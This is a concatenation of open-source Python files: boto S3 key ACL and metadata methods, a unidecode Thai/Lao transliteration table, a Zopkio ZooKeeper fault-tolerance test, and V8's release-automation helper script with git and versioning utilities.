to a key. This method retrieves the current ACL, creates a new
grant based on the parameters passed in, adds that grant to the ACL
and then PUT's the new ACL back to S3.
:type permission: string
:param permission: The permission being granted. Should be one of:
(READ, WRITE, READ_ACP, WRITE_ACP, FULL_CONTROL).
:type email_address: string
:param email_address: The email address associated with the AWS
account your are granting the permission to.
:type recursive: boolean
:param recursive: A boolean value to controls whether the
command will apply the grant to all keys within the bucket
or not. The default value is False. By passing a True
value, the call will iterate through all keys in the
bucket and apply the same grant to each key. CAUTION: If
you have a lot of keys, this could take a long time!
"""
policy = self.get_acl(headers=headers)
policy.acl.add_email_grant(permission, email_address)
self.set_acl(policy, headers=headers)
def add_user_grant(self, permission, user_id, headers=None,
display_name=None):
"""
Convenience method that provides a quick way to add a canonical
user grant to a key. This method retrieves the current ACL,
creates a new grant based on the parameters passed in, adds that
grant to the ACL and then PUT's the new ACL back to S3.
:type permission: string
:param permission: The permission being granted. Should be one of:
(READ, WRITE, READ_ACP, WRITE_ACP, FULL_CONTROL).
:type user_id: string
:param user_id: The canonical user id associated with the AWS
account your are granting the permission to.
:type display_name: string
:param display_name: An option string containing the user's
Display Name. Only required on Walrus.
"""
policy = self.get_acl(headers=headers)
policy.acl.add_user_grant(permission, user_id,
display_name=display_name)
self.set_acl(policy, headers=headers)
def _normalize_metadata(self, metadata):
if type(metadata) == set:
norm_metadata = set()
for k in metadata:
norm_metadata.add(k.lower())
else:
norm_metadata = {}
for k in metadata:
norm_metadata[k.lower()] = metadata[k]
return norm_metadata
def _get_remote_metadata(self, headers=None):
"""
Extracts metadata from existing URI into a dict, so we can
overwrite/delete from it to form the new set of metadata to apply to a
key.
"""
metadata = {}
for underscore_name in self._underscore_base_user_settable_fields:
if hasattr(self, underscore_name):
value = getattr(self, underscore_name)
if value:
# Generate HTTP field name corresponding to "_" named field.
field_name = underscore_name.replace('_', '-')
metadata[field_name.lower()] = value
# self.metadata contains custom metadata, which are all user-settable.
prefix = self.provider.metadata_prefix
for underscore_name in self.metadata:
field_name = underscore_name.replace('_', '-')
metadata['%s%s' % (prefix, field_name.lower())] = (
self.metadata[underscore_name])
return metadata
def set_remote_metadata(self, metadata_plus, metadata_minus, preserve_acl,
headers=None):
metadata_plus = self._normalize_metadata(metadata_plus)
metadata_minus = self._normalize_metadata(metadata_minus)
metadata = self._get_remote_metadata()
metadata.update(metadata_plus)
for h in metadata_minus:
if h in metadata:
del metadata[h]
src_bucket = self.bucket
# Boto prepends the meta prefix when adding headers, so strip prefix in
# metadata before sending back in to copy_key() call.
rewritten_metadata = {}
for h in metadata:
if (h.startswith('x-goog-meta-') or h.startswith('x-amz-meta-')):
rewritten_h = (h.replace('x-goog-meta-', '')
.replace('x-amz-meta-', ''))
else:
rewritten_h = h
rewritten_metadata[rewritten_h] = metadata[h]
metadata = rewritten_metadata
src_bucket.copy_key(self.name, self.bucket.name, self.name,
metadata=metadata, preserve_acl=preserve_acl,
headers=headers)
def restore(self, days, headers=None):
"""Restore an object from an archive.
:type days: int
:param days: The lifetime of the restored object (must
be at least 1 day). If the object is already restored
then this parameter can be used to readjust the lifetime
of the restored object. In this case, the days
param is with respect to the initial time of the request.
If the object has not been restored, this param is with
respect to the completion time of the request.
"""
response = self.bucket.connection.make_request(
'POST', self.bucket.name, self.name,
data=self.RestoreBody % days,
headers=headers, query_args='restore')
if response.status not in (200, 202):
provider = self.bucket.connection.provider
raise provider.storage_response_error(response.status,
response.reason,
response.read())
| mit |
menardorama/ReadyNAS-Add-ons | headphones-1.0.0/files/etc/apps/headphones/lib/unidecode/x00e.py | 252 | 4092 | data = (
'[?]', # 0x00
'k', # 0x01
'kh', # 0x02
'kh', # 0x03
'kh', # 0x04
'kh', # 0x05
'kh', # 0x06
'ng', # 0x07
'cch', # 0x08
'ch', # 0x09
'ch', # 0x0a
'ch', # 0x0b
'ch', # 0x0c
'y', # 0x0d
'd', # 0x0e
't', # 0x0f
'th', # 0x10
'th', # 0x11
'th', # 0x12
'n', # 0x13
'd', # 0x14
't', # 0x15
'th', # 0x16
'th', # 0x17
'th', # 0x18
'n', # 0x19
'b', # 0x1a
'p', # 0x1b
'ph', # 0x1c
'f', # 0x1d
'ph', # 0x1e
'f', # 0x1f
'ph', # 0x20
'm', # 0x21
'y', # 0x22
'r', # 0x23
'R', # 0x24
'l', # 0x25
'L', # 0x26
'w', # 0x27
's', # 0x28
's', # 0x29
's', # 0x2a
'h', # 0x2b
'l', # 0x2c
'`', # 0x2d
'h', # 0x2e
'~', # 0x2f
'a', # 0x30
'a', # 0x31
'aa', # 0x32
'am', # 0x33
'i', # 0x34
'ii', # 0x35
'ue', # 0x36
'uue', # 0x37
'u', # 0x38
'uu', # 0x39
'\'', # 0x3a
'[?]', # 0x3b
'[?]', # 0x3c
'[?]', # 0x3d
'[?]', # 0x3e
'Bh.', # 0x3f
'e', # 0x40
'ae', # 0x41
'o', # 0x42
'ai', # 0x43
'ai', # 0x44
'ao', # 0x45
'+', # 0x46
'', # 0x47
'', # 0x48
'', # 0x49
'', # 0x4a
'', # 0x4b
'', # 0x4c
'M', # 0x4d
'', # 0x4e
' * ', # 0x4f
'0', # 0x50
'1', # 0x51
'2', # 0x52
'3', # 0x53
'4', # 0x54
'5', # 0x55
'6', # 0x56
'7', # 0x57
'8', # 0x58
'9', # 0x59
' // ', # 0x5a
' /// ', # 0x5b
'[?]', # 0x5c
'[?]', # 0x5d
'[?]', # 0x5e
'[?]', # 0x5f
'[?]', # 0x60
'[?]', # 0x61
'[?]', # 0x62
'[?]', # 0x63
'[?]', # 0x64
'[?]', # 0x65
'[?]', # 0x66
'[?]', # 0x67
'[?]', # 0x68
'[?]', # 0x69
'[?]', # 0x6a
'[?]', # 0x6b
'[?]', # 0x6c
'[?]', # 0x6d
'[?]', # 0x6e
'[?]', # 0x6f
'[?]', # 0x70
'[?]', # 0x71
'[?]', # 0x72
'[?]', # 0x73
'[?]', # 0x74
'[?]', # 0x75
'[?]', # 0x76
'[?]', # 0x77
'[?]', # 0x78
'[?]', # 0x79
'[?]', # 0x7a
'[?]', # 0x7b
'[?]', # 0x7c
'[?]', # 0x7d
'[?]', # 0x7e
'[?]', # 0x7f
'[?]', # 0x80
'k', # 0x81
'kh', # 0x82
'[?]', # 0x83
'kh', # 0x84
'[?]', # 0x85
'[?]', # 0x86
'ng', # 0x87
'ch', # 0x88
'[?]', # 0x89
's', # 0x8a
'[?]', # 0x8b
'[?]', # 0x8c
'ny', # 0x8d
'[?]', # 0x8e
'[?]', # 0x8f
'[?]', # 0x90
'[?]', # 0x91
'[?]', # 0x92
'[?]', # 0x93
'd', # 0x94
'h', # 0x95
'th', # 0x96
'th', # 0x97
'[?]', # 0x98
'n', # 0x99
'b', # 0x9a
'p', # 0x9b
'ph', # 0x9c
'f', # 0x9d
'ph', # 0x9e
'f', # 0x9f
'[?]', # 0xa0
'm', # 0xa1
'y', # 0xa2
'r', # 0xa3
'[?]', # 0xa4
'l', # 0xa5
'[?]', # 0xa6
'w', # 0xa7
'[?]', # 0xa8
'[?]', # 0xa9
's', # 0xaa
'h', # 0xab
'[?]', # 0xac
'`', # 0xad
'', # 0xae
'~', # 0xaf
'a', # 0xb0
'', # 0xb1
'aa', # 0xb2
'am', # 0xb3
'i', # 0xb4
'ii', # 0xb5
'y', # 0xb6
'yy', # 0xb7
'u', # 0xb8
'uu', # 0xb9
'[?]', # 0xba
'o', # 0xbb
'l', # 0xbc
'ny', # 0xbd
'[?]', # 0xbe
'[?]', # 0xbf
'e', # 0xc0
'ei', # 0xc1
'o', # 0xc2
'ay', # 0xc3
'ai', # 0xc4
'[?]', # 0xc5
'+', # 0xc6
'[?]', # 0xc7
'', # 0xc8
'', # 0xc9
'', # 0xca
'', # 0xcb
'', # 0xcc
'M', # 0xcd
'[?]', # 0xce
'[?]', # 0xcf
'0', # 0xd0
'1', # 0xd1
'2', # 0xd2
'3', # 0xd3
'4', # 0xd4
'5', # 0xd5
'6', # 0xd6
'7', # 0xd7
'8', # 0xd8
'9', # 0xd9
'[?]', # 0xda
'[?]', # 0xdb
'hn', # 0xdc
'hm', # 0xdd
'[?]', # 0xde
'[?]', # 0xdf
'[?]', # 0xe0
'[?]', # 0xe1
'[?]', # 0xe2
'[?]', # 0xe3
'[?]', # 0xe4
'[?]', # 0xe5
'[?]', # 0xe6
'[?]', # 0xe7
'[?]', # 0xe8
'[?]', # 0xe9
'[?]', # 0xea
'[?]', # 0xeb
'[?]', # 0xec
'[?]', # 0xed
'[?]', # 0xee
'[?]', # 0xef
'[?]', # 0xf0
'[?]', # 0xf1
'[?]', # 0xf2
'[?]', # 0xf3
'[?]', # 0xf4
'[?]', # 0xf5
'[?]', # 0xf6
'[?]', # 0xf7
'[?]', # 0xf8
'[?]', # 0xf9
'[?]', # 0xfa
'[?]', # 0xfb
'[?]', # 0xfc
'[?]', # 0xfd
'[?]', # 0xfe
)
| gpl-2.0 |
pubnub/Zopkio | examples/zookeeper/test_suites/zookeeper_test_faulttolerance.py | 4 | 1959 | # Copyright 2015 LinkedIn Corp.
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
from kazoo.client import KazooClient
from multiprocessing import Process
import time
import zopkio.runtime as runtime
import zopkio.test_utils as testutilities
import zopkio.adhoc_deployer as adhoc_deployer
zookeper_deployer = None
test_phase = 2
def test_zookeeper_fault_tolerance():
"""
Kill zookeeper1 and see if other zookeeper instances are in quorum
"""
zookeper_deployer = runtime.get_deployer("zookeeper")
kazoo_connection_url = str(runtime.get_active_config('zookeeper_host') + ':2181')
zkclient = KazooClient(hosts=kazoo_connection_url)
zkclient.start()
zkclient.ensure_path("/my/zookeeper_errorinjection")
# kill the Zookeeper1 instance
print "killing zoookeeper instance1"
zookeper_deployer.kill("zookeeper1")
time.sleep(20)
zkclient.stop()
def validate_zookeeper_fault_tolerance():
"""
Validate that we can still connect to zookeeper instance 2 to read the node
"""
zk2 = KazooClient(hosts=str(runtime.get_active_config('zookeeper_host') + ':2182'))
zk2.start()
assert zk2.exists("/my/zookeeper_errorinjection/"), "zookeeper_errorinjection node not found"
zk2.stop()
| apache-2.0 |
Champii/runtime | deps/v8/tools/release/common_includes.py | 21 | 29230 | #!/usr/bin/env python
# Copyright 2013 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import argparse
import datetime
import httplib
import glob
import imp
import json
import os
import re
import shutil
import subprocess
import sys
import textwrap
import time
import urllib
import urllib2
from git_recipes import GitRecipesMixin
from git_recipes import GitFailedException
CHANGELOG_FILE = "ChangeLog"
DAY_IN_SECONDS = 24 * 60 * 60
PUSH_MSG_GIT_RE = re.compile(r".* \(based on (?P<git_rev>[a-fA-F0-9]+)\)$")
PUSH_MSG_NEW_RE = re.compile(r"^Version \d+\.\d+\.\d+$")
VERSION_FILE = os.path.join("include", "v8-version.h")
VERSION_RE = re.compile(r"^\d+\.\d+\.\d+(?:\.\d+)?$")
# V8 base directory.
V8_BASE = os.path.dirname(
os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
def TextToFile(text, file_name):
with open(file_name, "w") as f:
f.write(text)
def AppendToFile(text, file_name):
with open(file_name, "a") as f:
f.write(text)
def LinesInFile(file_name):
with open(file_name) as f:
for line in f:
yield line
def FileToText(file_name):
with open(file_name) as f:
return f.read()
def MSub(rexp, replacement, text):
return re.sub(rexp, replacement, text, flags=re.MULTILINE)
def Fill80(line):
# Replace tabs and remove surrounding space.
line = re.sub(r"\t", r" ", line.strip())
# Format with 8 characters indentation and line width 80.
return textwrap.fill(line, width=80, initial_indent=" ",
subsequent_indent=" ")
def MakeComment(text):
return MSub(r"^( ?)", "#", text)
def StripComments(text):
# Use split not splitlines to keep terminal newlines.
return "\n".join(filter(lambda x: not x.startswith("#"), text.split("\n")))
def MakeChangeLogBody(commit_messages, auto_format=False):
result = ""
added_titles = set()
for (title, body, author) in commit_messages:
# TODO(machenbach): Better check for reverts. A revert should remove the
# original CL from the actual log entry.
title = title.strip()
if auto_format:
# Only add commits that set the LOG flag correctly.
log_exp = r"^[ \t]*LOG[ \t]*=[ \t]*(?:(?:Y(?:ES)?)|TRUE)"
if not re.search(log_exp, body, flags=re.I | re.M):
continue
# Never include reverts.
if title.startswith("Revert "):
continue
# Don't include duplicates.
if title in added_titles:
continue
# Add and format the commit's title and bug reference. Move dot to the end.
added_titles.add(title)
raw_title = re.sub(r"(\.|\?|!)$", "", title)
bug_reference = MakeChangeLogBugReference(body)
space = " " if bug_reference else ""
result += "%s\n" % Fill80("%s%s%s." % (raw_title, space, bug_reference))
# Append the commit's author for reference if not in auto-format mode.
if not auto_format:
result += "%s\n" % Fill80("(%s)" % author.strip())
result += "\n"
return result
def MakeChangeLogBugReference(body):
"""Grep for "BUG=xxxx" lines in the commit message and convert them to
"(issue xxxx)".
"""
crbugs = []
v8bugs = []
def AddIssues(text):
ref = re.match(r"^BUG[ \t]*=[ \t]*(.+)$", text.strip())
if not ref:
return
for bug in ref.group(1).split(","):
bug = bug.strip()
match = re.match(r"^v8:(\d+)$", bug)
if match: v8bugs.append(int(match.group(1)))
else:
match = re.match(r"^(?:chromium:)?(\d+)$", bug)
if match: crbugs.append(int(match.group(1)))
# Add issues to crbugs and v8bugs.
map(AddIssues, body.splitlines())
# Filter duplicates, sort, stringify.
crbugs = map(str, sorted(set(crbugs)))
v8bugs = map(str, sorted(set(v8bugs)))
bug_groups = []
def FormatIssues(prefix, bugs):
if len(bugs) > 0:
plural = "s" if len(bugs) > 1 else ""
bug_groups.append("%sissue%s %s" % (prefix, plural, ", ".join(bugs)))
FormatIssues("", v8bugs)
FormatIssues("Chromium ", crbugs)
if len(bug_groups) > 0:
return "(%s)" % ", ".join(bug_groups)
else:
return ""
def SortingKey(version):
"""Key for sorting version number strings: '3.11' > '3.2.1.1'"""
version_keys = map(int, version.split("."))
# Fill up to full version numbers to normalize comparison.
while len(version_keys) < 4: # pragma: no cover
version_keys.append(0)
# Fill digits.
return ".".join(map("{0:04d}".format, version_keys))
# Some commands don't like the pipe, e.g. calling vi from within the script or
# from subscripts like git cl upload.
def Command(cmd, args="", prefix="", pipe=True, cwd=None):
cwd = cwd or os.getcwd()
# TODO(machenbach): Use timeout.
cmd_line = "%s %s %s" % (prefix, cmd, args)
print "Command: %s" % cmd_line
print "in %s" % cwd
sys.stdout.flush()
try:
if pipe:
return subprocess.check_output(cmd_line, shell=True, cwd=cwd)
else:
return subprocess.check_call(cmd_line, shell=True, cwd=cwd)
except subprocess.CalledProcessError:
return None
finally:
sys.stdout.flush()
sys.stderr.flush()
# Wrapper for side effects.
class SideEffectHandler(object): # pragma: no cover
def Call(self, fun, *args, **kwargs):
return fun(*args, **kwargs)
def Command(self, cmd, args="", prefix="", pipe=True, cwd=None):
return Command(cmd, args, prefix, pipe, cwd=cwd)
def ReadLine(self):
return sys.stdin.readline().strip()
def ReadURL(self, url, params=None):
# pylint: disable=E1121
url_fh = urllib2.urlopen(url, params, 60)
try:
return url_fh.read()
finally:
url_fh.close()
def ReadClusterFuzzAPI(self, api_key, **params):
params["api_key"] = api_key.strip()
params = urllib.urlencode(params)
headers = {"Content-type": "application/x-www-form-urlencoded"}
conn = httplib.HTTPSConnection("backend-dot-cluster-fuzz.appspot.com")
conn.request("POST", "/_api/", params, headers)
response = conn.getresponse()
data = response.read()
try:
return json.loads(data)
except:
print data
print "ERROR: Could not read response. Is your key valid?"
raise
def Sleep(self, seconds):
time.sleep(seconds)
def GetDate(self):
return datetime.date.today().strftime("%Y-%m-%d")
def GetUTCStamp(self):
return time.mktime(datetime.datetime.utcnow().timetuple())
DEFAULT_SIDE_EFFECT_HANDLER = SideEffectHandler()
class NoRetryException(Exception):
pass
class VCInterface(object):
def InjectStep(self, step):
self.step=step
def Pull(self):
raise NotImplementedError()
def Fetch(self):
raise NotImplementedError()
def GetTags(self):
raise NotImplementedError()
def GetBranches(self):
raise NotImplementedError()
def MasterBranch(self):
raise NotImplementedError()
def CandidateBranch(self):
raise NotImplementedError()
def RemoteMasterBranch(self):
raise NotImplementedError()
def RemoteCandidateBranch(self):
raise NotImplementedError()
def RemoteBranch(self, name):
raise NotImplementedError()
def CLLand(self):
raise NotImplementedError()
def Tag(self, tag, remote, message):
"""Sets a tag for the current commit.
Assumptions: The commit already landed and the commit message is unique.
"""
raise NotImplementedError()
class GitInterface(VCInterface):
def Pull(self):
self.step.GitPull()
def Fetch(self):
self.step.Git("fetch")
def GetTags(self):
return self.step.Git("tag").strip().splitlines()
def GetBranches(self):
# Get relevant remote branches, e.g. "branch-heads/3.25".
branches = filter(
lambda s: re.match(r"^branch\-heads/\d+\.\d+$", s),
self.step.GitRemotes())
# Remove 'branch-heads/' prefix.
return map(lambda s: s[13:], branches)
def MasterBranch(self):
return "master"
def CandidateBranch(self):
return "candidates"
def RemoteMasterBranch(self):
return "origin/master"
def RemoteCandidateBranch(self):
return "origin/candidates"
def RemoteBranch(self, name):
# Assume that if someone "fully qualified" the ref, they know what they
# want.
if name.startswith('refs/'):
return name
if name in ["candidates", "master"]:
return "refs/remotes/origin/%s" % name
try:
# Check if branch is in heads.
if self.step.Git("show-ref refs/remotes/origin/%s" % name).strip():
return "refs/remotes/origin/%s" % name
except GitFailedException:
pass
try:
# Check if branch is in branch-heads.
if self.step.Git("show-ref refs/remotes/branch-heads/%s" % name).strip():
return "refs/remotes/branch-heads/%s" % name
except GitFailedException:
pass
self.Die("Can't find remote of %s" % name)
def Tag(self, tag, remote, message):
# Wait for the commit to appear. Assumes unique commit message titles (this
# is the case for all automated merge and push commits - also no title is
# the prefix of another title).
commit = None
for wait_interval in [3, 7, 15, 35, 45, 60]:
self.step.Git("fetch")
commit = self.step.GitLog(n=1, format="%H", grep=message, branch=remote)
if commit:
break
print("The commit has not replicated to git. Waiting for %s seconds." %
wait_interval)
self.step._side_effect_handler.Sleep(wait_interval)
else:
self.step.Die("Couldn't determine commit for setting the tag. Maybe the "
"git updater is lagging behind?")
self.step.Git("tag %s %s" % (tag, commit))
self.step.Git("push origin %s" % tag)
def CLLand(self):
self.step.GitCLLand()
class Step(GitRecipesMixin):
def __init__(self, text, number, config, state, options, handler):
self._text = text
self._number = number
self._config = config
self._state = state
self._options = options
self._side_effect_handler = handler
self.vc = GitInterface()
self.vc.InjectStep(self)
# The testing configuration might set a different default cwd.
self.default_cwd = (self._config.get("DEFAULT_CWD") or
os.path.join(self._options.work_dir, "v8"))
assert self._number >= 0
assert self._config is not None
assert self._state is not None
assert self._side_effect_handler is not None
def __getitem__(self, key):
# Convenience method to allow direct [] access on step classes for
# manipulating the backed state dict.
return self._state.get(key)
def __setitem__(self, key, value):
# Convenience method to allow direct [] access on step classes for
# manipulating the backed state dict.
self._state[key] = value
def Config(self, key):
return self._config[key]
def Run(self):
# Restore state.
state_file = "%s-state.json" % self._config["PERSISTFILE_BASENAME"]
if not self._state and os.path.exists(state_file):
self._state.update(json.loads(FileToText(state_file)))
print ">>> Step %d: %s" % (self._number, self._text)
try:
return self.RunStep()
finally:
# Persist state.
TextToFile(json.dumps(self._state), state_file)
def RunStep(self): # pragma: no cover
raise NotImplementedError
def Retry(self, cb, retry_on=None, wait_plan=None):
""" Retry a function.
Params:
cb: The function to retry.
retry_on: A callback that takes the result of the function and returns
True if the function should be retried. A function throwing an
exception is always retried.
wait_plan: A list of waiting delays between retries in seconds. The
maximum number of retries is len(wait_plan).
"""
retry_on = retry_on or (lambda x: False)
wait_plan = list(wait_plan or [])
wait_plan.reverse()
while True:
got_exception = False
try:
result = cb()
except NoRetryException as e:
raise e
except Exception as e:
got_exception = e
if got_exception or retry_on(result):
if not wait_plan: # pragma: no cover
raise Exception("Retried too often. Giving up. Reason: %s" %
str(got_exception))
wait_time = wait_plan.pop()
print "Waiting for %f seconds." % wait_time
self._side_effect_handler.Sleep(wait_time)
print "Retrying..."
else:
return result
def ReadLine(self, default=None):
# Don't prompt in forced mode.
if self._options.force_readline_defaults and default is not None:
print "%s (forced)" % default
return default
else:
return self._side_effect_handler.ReadLine()
def Command(self, name, args, cwd=None):
cmd = lambda: self._side_effect_handler.Command(
name, args, "", True, cwd=cwd or self.default_cwd)
return self.Retry(cmd, None, [5])
def Git(self, args="", prefix="", pipe=True, retry_on=None, cwd=None):
cmd = lambda: self._side_effect_handler.Command(
"git", args, prefix, pipe, cwd=cwd or self.default_cwd)
result = self.Retry(cmd, retry_on, [5, 30])
if result is None:
raise GitFailedException("'git %s' failed." % args)
return result
def Editor(self, args):
if self._options.requires_editor:
return self._side_effect_handler.Command(
os.environ["EDITOR"],
args,
pipe=False,
cwd=self.default_cwd)
def ReadURL(self, url, params=None, retry_on=None, wait_plan=None):
wait_plan = wait_plan or [3, 60, 600]
cmd = lambda: self._side_effect_handler.ReadURL(url, params)
return self.Retry(cmd, retry_on, wait_plan)
def GetDate(self):
return self._side_effect_handler.GetDate()
def Die(self, msg=""):
if msg != "":
print "Error: %s" % msg
print "Exiting"
raise Exception(msg)
def DieNoManualMode(self, msg=""):
if not self._options.manual: # pragma: no cover
msg = msg or "Only available in manual mode."
self.Die(msg)
def Confirm(self, msg):
print "%s [Y/n] " % msg,
answer = self.ReadLine(default="Y")
return answer == "" or answer == "Y" or answer == "y"
def DeleteBranch(self, name, cwd=None):
for line in self.GitBranch(cwd=cwd).splitlines():
if re.match(r"\*?\s*%s$" % re.escape(name), line):
msg = "Branch %s exists, do you want to delete it?" % name
if self.Confirm(msg):
self.GitDeleteBranch(name, cwd=cwd)
print "Branch %s deleted." % name
else:
msg = "Can't continue. Please delete branch %s and try again." % name
self.Die(msg)
def InitialEnvironmentChecks(self, cwd):
# Cancel if this is not a git checkout.
if not os.path.exists(os.path.join(cwd, ".git")): # pragma: no cover
self.Die("This is not a git checkout, this script won't work for you.")
# Cancel if EDITOR is unset or not executable.
if (self._options.requires_editor and (not os.environ.get("EDITOR") or
self.Command(
"which", os.environ["EDITOR"]) is None)): # pragma: no cover
self.Die("Please set your EDITOR environment variable, you'll need it.")
def CommonPrepare(self):
# Check for a clean workdir.
if not self.GitIsWorkdirClean(): # pragma: no cover
self.Die("Workspace is not clean. Please commit or undo your changes.")
# Checkout master in case the script was left on a work branch.
self.GitCheckout('origin/master')
# Fetch unfetched revisions.
self.vc.Fetch()
def PrepareBranch(self):
# Delete the branch that will be created later if it exists already.
self.DeleteBranch(self._config["BRANCHNAME"])
def CommonCleanup(self):
self.GitCheckout('origin/master')
self.GitDeleteBranch(self._config["BRANCHNAME"])
# Clean up all temporary files.
for f in glob.iglob("%s*" % self._config["PERSISTFILE_BASENAME"]):
if os.path.isfile(f):
os.remove(f)
if os.path.isdir(f):
shutil.rmtree(f)
def ReadAndPersistVersion(self, prefix=""):
def ReadAndPersist(var_name, def_name):
match = re.match(r"^#define %s\s+(\d*)" % def_name, line)
if match:
value = match.group(1)
self["%s%s" % (prefix, var_name)] = value
for line in LinesInFile(os.path.join(self.default_cwd, VERSION_FILE)):
for (var_name, def_name) in [("major", "V8_MAJOR_VERSION"),
("minor", "V8_MINOR_VERSION"),
("build", "V8_BUILD_NUMBER"),
("patch", "V8_PATCH_LEVEL")]:
ReadAndPersist(var_name, def_name)
def WaitForLGTM(self):
print ("Please wait for an LGTM, then type \"LGTM<Return>\" to commit "
"your change. (If you need to iterate on the patch or double check "
"that it's sane, do so in another shell, but remember to not "
"change the headline of the uploaded CL.")
answer = ""
while answer != "LGTM":
print "> ",
answer = self.ReadLine(None if self._options.wait_for_lgtm else "LGTM")
if answer != "LGTM":
print "That was not 'LGTM'."
def WaitForResolvingConflicts(self, patch_file):
print("Applying the patch \"%s\" failed. Either type \"ABORT<Return>\", "
"or resolve the conflicts, stage *all* touched files with "
"'git add', and type \"RESOLVED<Return>\"")
self.DieNoManualMode()
answer = ""
while answer != "RESOLVED":
if answer == "ABORT":
self.Die("Applying the patch failed.")
if answer != "":
print "That was not 'RESOLVED' or 'ABORT'."
print "> ",
answer = self.ReadLine()
# Takes a file containing the patch to apply as first argument.
def ApplyPatch(self, patch_file, revert=False):
try:
self.GitApplyPatch(patch_file, revert)
except GitFailedException:
self.WaitForResolvingConflicts(patch_file)
def GetVersionTag(self, revision):
tag = self.Git("describe --tags %s" % revision).strip()
if VERSION_RE.match(tag):
return tag
else:
return None
def GetRecentReleases(self, max_age):
# Make sure tags are fetched.
self.Git("fetch origin +refs/tags/*:refs/tags/*")
# Current timestamp.
time_now = int(self._side_effect_handler.GetUTCStamp())
# List every tag from a given period.
revisions = self.Git("rev-list --max-age=%d --tags" %
int(time_now - max_age)).strip()
# Filter out revisions who's tag is off by one or more commits.
return filter(lambda r: self.GetVersionTag(r), revisions.splitlines())
def GetLatestVersion(self):
# Use cached version if available.
if self["latest_version"]:
return self["latest_version"]
# Make sure tags are fetched.
self.Git("fetch origin +refs/tags/*:refs/tags/*")
version = sorted(filter(VERSION_RE.match, self.vc.GetTags()),
key=SortingKey, reverse=True)[0]
self["latest_version"] = version
return version
def GetLatestRelease(self):
"""The latest release is the git hash of the latest tagged version.
This revision should be rolled into chromium.
"""
latest_version = self.GetLatestVersion()
# The latest release.
latest_hash = self.GitLog(n=1, format="%H", branch=latest_version)
assert latest_hash
return latest_hash
def GetLatestReleaseBase(self, version=None):
"""The latest release base is the latest revision that is covered in the
last change log file. It doesn't include cherry-picked patches.
"""
latest_version = version or self.GetLatestVersion()
# Strip patch level if it exists.
latest_version = ".".join(latest_version.split(".")[:3])
# The latest release base.
latest_hash = self.GitLog(n=1, format="%H", branch=latest_version)
assert latest_hash
title = self.GitLog(n=1, format="%s", git_hash=latest_hash)
match = PUSH_MSG_GIT_RE.match(title)
if match:
# Legacy: In the old process there's one level of indirection. The
# version is on the candidates branch and points to the real release
# base on master through the commit message.
return match.group("git_rev")
match = PUSH_MSG_NEW_RE.match(title)
if match:
# This is a new-style v8 version branched from master. The commit
# "latest_hash" is the version-file change. Its parent is the release
# base on master.
return self.GitLog(n=1, format="%H", git_hash="%s^" % latest_hash)
self.Die("Unknown latest release: %s" % latest_hash)
def ArrayToVersion(self, prefix):
return ".".join([self[prefix + "major"],
self[prefix + "minor"],
self[prefix + "build"],
self[prefix + "patch"]])
def StoreVersion(self, version, prefix):
version_parts = version.split(".")
if len(version_parts) == 3:
version_parts.append("0")
major, minor, build, patch = version_parts
self[prefix + "major"] = major
self[prefix + "minor"] = minor
self[prefix + "build"] = build
self[prefix + "patch"] = patch
def SetVersion(self, version_file, prefix):
output = ""
for line in FileToText(version_file).splitlines():
if line.startswith("#define V8_MAJOR_VERSION"):
line = re.sub("\d+$", self[prefix + "major"], line)
elif line.startswith("#define V8_MINOR_VERSION"):
line = re.sub("\d+$", self[prefix + "minor"], line)
elif line.startswith("#define V8_BUILD_NUMBER"):
line = re.sub("\d+$", self[prefix + "build"], line)
elif line.startswith("#define V8_PATCH_LEVEL"):
line = re.sub("\d+$", self[prefix + "patch"], line)
elif (self[prefix + "candidate"] and
line.startswith("#define V8_IS_CANDIDATE_VERSION")):
line = re.sub("\d+$", self[prefix + "candidate"], line)
output += "%s\n" % line
TextToFile(output, version_file)
class BootstrapStep(Step):
MESSAGE = "Bootstapping v8 checkout."
def RunStep(self):
if os.path.realpath(self.default_cwd) == os.path.realpath(V8_BASE):
self.Die("Can't use v8 checkout with calling script as work checkout.")
# Directory containing the working v8 checkout.
if not os.path.exists(self._options.work_dir):
os.makedirs(self._options.work_dir)
if not os.path.exists(self.default_cwd):
self.Command("fetch", "v8", cwd=self._options.work_dir)
class UploadStep(Step):
MESSAGE = "Upload for code review."
def RunStep(self):
if self._options.reviewer:
print "Using account %s for review." % self._options.reviewer
reviewer = self._options.reviewer
else:
print "Please enter the email address of a V8 reviewer for your patch: ",
self.DieNoManualMode("A reviewer must be specified in forced mode.")
reviewer = self.ReadLine()
self.GitUpload(reviewer, self._options.author, self._options.force_upload,
